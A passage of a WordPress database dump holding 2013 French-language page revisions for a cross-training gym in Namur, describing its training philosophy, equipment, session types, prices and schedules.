…\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:52:09', '2013-07-04 18:52:09', '', 5, 'http://www.crosstrainingcenter.be/5-revision-37/', 0, 'revision', '', 0),
(293, 1, '2013-07-04 18:53:14', '2013-07-04 18:53:14', '<h1>Assurer un entraînement de qualité :</h1>\r\n&nbsp;\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n<h1></h1>\r\n<h1>L\'activité physique, l\'alimentation et le stress : une approche globale</h1>\r\nAfin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-07-04 18:53:14', '2013-07-04 18:53:14', '', 5, 'http://www.crosstrainingcenter.be/5-revision-39/', 0, 'revision', '', 0),
(93, 1, '2013-06-16 13:08:28', '2013-06-16 13:08:28', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-78 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>\r\n\r\nSelon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:08:28', '2013-06-16 13:08:28', '', 5, 'http://www.crosstrainingcenter.be/?p=93', 0, 'revision', '', 0),
(95, 1, '2013-06-16 13:12:40', '2013-06-16 13:12:40', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-92 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x98.png\" width=\"300\" height=\"98\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:12:40', '2013-06-16 13:12:40', '', 5, 'http://www.crosstrainingcenter.be/?p=95', 0, 'revision', '', 0),
(97, 1, '2013-06-16 13:19:06', '2013-06-16 13:19:06', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-94 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x82.png\" width=\"300\" height=\"82\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:19:06', '2013-06-16 13:19:06', '', 5, 'http://www.crosstrainingcenter.be/?p=97', 0, 'revision', '', 0),
(99, 1, '2013-06-16 13:27:37', '2013-06-16 13:27:37', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-90 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-292x300.png\" width=\"292\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:27:37', '2013-06-16 13:27:37', '', 5, 'http://www.crosstrainingcenter.be/?p=99', 0, 'revision', '', 0),
(100, 1, '2013-06-16 13:44:39', '2013-06-16 13:44:39', '<h2>Assurer un entraînement de qualité :</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1.png\"><img class=\"size-medium wp-image-96 alignleft\" alt=\"pico1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/pico1-300x77.png\" width=\"300\" height=\"77\" /></a>Selon Guy Namurois, l’activité physique doit poursuivre trois objectifs en parallèle : <strong>récupérer</strong>, <strong>prévenir</strong> et <strong>améliorer</strong>. En privilégiant alternativement chacun d\'eux suivant l\'état de forme et les buts poursuivis, la qualité de l\'entraînement sera assuré.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2></h2>\r\n<h2>L\'activité physique, l\'alimentation et le stress : une approche globale</h2>\r\n&nbsp;\r\n\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2.png\"><img class=\"size-medium wp-image-98 alignleft\" alt=\"picto2\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/picto2-291x300.png\" width=\"291\" height=\"300\" /></a>Afin d’optimaliser votre travail et de répondre aux besoins spécifiques de chacun, le Cross Training Center de Namur ne conçoit pas l’activité physique de manière isolée. En effet, nous avons décidé d’intervenir à trois niveaux :\r\n<p style=\"text-align: center;\"><b>ALIMENTATION</b> – <b>ACTIVITE PHYSIQUE </b>– <b>STRESS</b></p>\r\nNous intervenons principalement au niveau de l’ALIMENTATION et au niveau de l’ACTIVITE PHYSIQUE. Cependant, un travail spécifique peut aussi se réaliser au niveau du STRESS.\r\n\r\nPour ce faire, nous avons mis sur pied une équipe pluri-disciplinaire composée de spécialistes de l’éducation physique, de la kinésithérapie, de la diététique, de la médecine, …\r\n\r\nChaque semaine, l’homme moderne passe une grosse partie de son temps à dormir, assis, en déplacement, à s’occuper de ses proches, … Il ne lui reste plus beaucoup de temps.  Il nous est alors inconcevable d’imaginer de longues séances de travail assis sur des machines dans des salles conventionnelles de fitness. C’est pourquoi l’équipe de votre Cross training center a opté pour un travail de qualité de 30 minutes, suffisant pour stimuler l’organisme, facile à caser dans nos agendas et fonctionnel pour correspondre au travail musculaire réel rencontré dans la vie de tous les jours.\r\n\r\nEn fonction de vos besoins, nous vous proposerons aussi une aide pour vous aider à perdre du poids, à prendre de la masse,… et vous orienterons vers des compléments Forever adaptés si nécessaire.', 'Notre Philosophie', '', 'inherit', 'open', 'open', '', '5-revision-v1', '', '', '2013-06-16 13:44:39', '2013-06-16 13:44:39', '', 5, 'http://www.crosstrainingcenter.be/?p=100', 0, 'revision', '', 0),
(101, 1, '2013-06-16 11:22:47', '2013-06-16 11:22:47', '<blockquote>\r\n<h2>Le cross training est une méthode d\'entraînement moderne et ludique regroupant les meilleurs exercices issus de différentes disciplines.</h2>\r\n</blockquote>\r\nAfin de vous permettre d\'atteindre vos objectifs, nous avons choisi pour vous plusieurs outils innovants le TRX, le RIP Trainer, le Kettlebell, le ViPR ainsi qu’une multitude de petits matériels (bosu, swissball, plateau freeman, échelle de rythme, …). Nous vous invitons à les découvrir ci-dessous. »\r\n<h2></h2>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\"><img class=\"alignnone size-full wp-image-68\" alt=\"trx1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/trx1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>TRX Suspension Training</h1>\r\nConçu à l’origine pour des US Navy SEAL, comme outil d’entrainement, le TRX est utilisé de plus en plus dans les salles de fitness et par des équipes professionnelles pour compléter leurs entrainements. Accessible à tous, le TRX est un système moderne d’entrainement qui utilise le poids du corps pour travailler la force fonctionnelle pure, améliorer la flexibilité, l’équilibre et la stabilité du centre du corps.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\"><img class=\"alignnone size-full wp-image-70\" alt=\"kb\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/kb.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>Kettlebel</h1>\r\nOutil d’entrainement qui a ses origines en Russie. Le Kettlebell permet de cibler des zones musculaires inaccessibles avec les haltères et charges guidées traditionnelles. Il autorise une très grande diversité de mouvements tout en renforçant les muscles des poignets et des avant-bras. Cet outil accroît considérablement la coordination et l\'équilibre. Le travail à l\'aide de Kettlebells fournit une excellente combinaison entre puissance musculaire et stretching en permettant le travail de tous les groupes musculaires inaccessibles avec un entraînement traditionnel.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\"><img class=\"alignnone size-full wp-image-72\" alt=\"vipr-f1\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/vipr-f1.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>ViPR</h1>\r\nAcronyme pour Vitalité, Performance et Reconditionnement. Le ViPR a été créé à partir de la nécessité de faire évoluer les outils d\'entraînement, de favoriser les mouvements ciblés et de combiner l\'entraînement de force avec un entraînement fonctionnel. La combinaison de levage, de déplacement et de rotation rend cet outil d\'entraînement très efficace.
Pratiquement indestructible et incroyablement fonctionnel, il est conçu pour développer le corps dans son entièreté.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\"><img class=\"alignnone size-full wp-image-75\" alt=\"ript\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/ript.jpg\" width=\"200\" height=\"200\" /></a></td>\r\n<td style=\"border: 0px; padding: 5px;\">\r\n<h1>RIP Trainer</h1>\r\nLe Rip Trainer est un des outils les plus efficaces pour les entrainements fonctionnels et pour le renforcement du centre du corps. Il a été conçu par Peter Holman, kinésithérapeute américain. Chaque exercice avec le Rip Trainer exige l\'engagement de toute la ceinture abdominale et entraine le corps à bouger avec plus de puissance et de stabilité.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n&nbsp;', 'Le cross training', '', 'inherit', 'open', 'open', '', '22-revision-v1', '', '', '2013-06-16 11:22:47', '2013-06-16 11:22:47', '', 22, 'http://www.crosstrainingcenter.be/?p=101', 0, 'revision', '', 0),
(105, 1, '2013-06-13 16:27:32', '2013-06-13 16:27:32', 'Nous vous  proposons chaque jour :\r\n\r\n- Team Training : entrainements en groupe avec un coach qualifié (8 à 12 pers.).\r\n\r\n- Duo Training : entrainements à deux personnes sous la supervision d’un coach.\r\n\r\n- Personal Training : un coach par personne, l’idéal pour progresser plus rapidement !\r\n- Coaching nutritionnel : rendez-vous avec une diététicienne pour améliorer votre santé.\r\n\r\n&nbsp;\r\n\r\nPrix ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n\r\nHoraire ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-13 16:27:32', '2013-06-13 16:27:32', '', 11, 'http://www.crosstrainingcenter.be/?p=105', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(106, 1, '2013-06-16 14:01:57', '2013-06-16 14:01:57', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n\r\nPrix ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n\r\nHoraire ?\r\n\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:01:57', '2013-06-16 14:01:57', '', 11, 'http://www.crosstrainingcenter.be/?p=106', 0, 'revision', '', 0),
(107, 1, '2013-06-16 14:14:58', '2013-06-16 14:14:58', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n\r\n<table style=\"border:0px;width: 100%\">\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Team Training (réservation obligatoire)\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Package alimentation + sport\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n<tr>\r\n<td style=\"border:0px;padding:5px;\">Coaching nutritionnel\r\n</td>\r\n<td style=\"border:0px;padding:5px;\">blabla\r\n</tr>\r\n</table> \r\n<br><br><br>\r\n- Team Training (réservation obligatoire)\r\n\r\n1 séance : 9.00€\r\n\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\n\r\nAbonnement 1 mois illimité : 69.00€\r\n\r\n- Package alimentation + sport\r\n\r\n1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€\r\n\r\n- Coaching nutritionnel\r\n\r\n1<sup>er</sup> rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\n\r\nSuivi 15,00€\r\n\r\n&nbsp;\r\n<h2>Horaire :</h2>\r\n- Team Training (réservation obligatoire)\r\n\r\nDu Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\n\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00\r\n\r\n&nbsp;\r\n\r\n- Personal et Duo Training (sur rendez-vous)\r\n\r\nTous les jours du lundi au dimanche.\r\n\r\n&nbsp;\r\n\r\nLes cours ?\r\n\r\n- <span style=\"text-decoration: underline;\">TRX</span> : entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n- <span style=\"text-decoration: underline;\">Circuit GLFE</span> : travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n- <span style=\"text-decoration: underline;\">RIP-KETTLE</span> : alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n- <span style=\"text-decoration: underline;\">CARDIO</span> : pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', 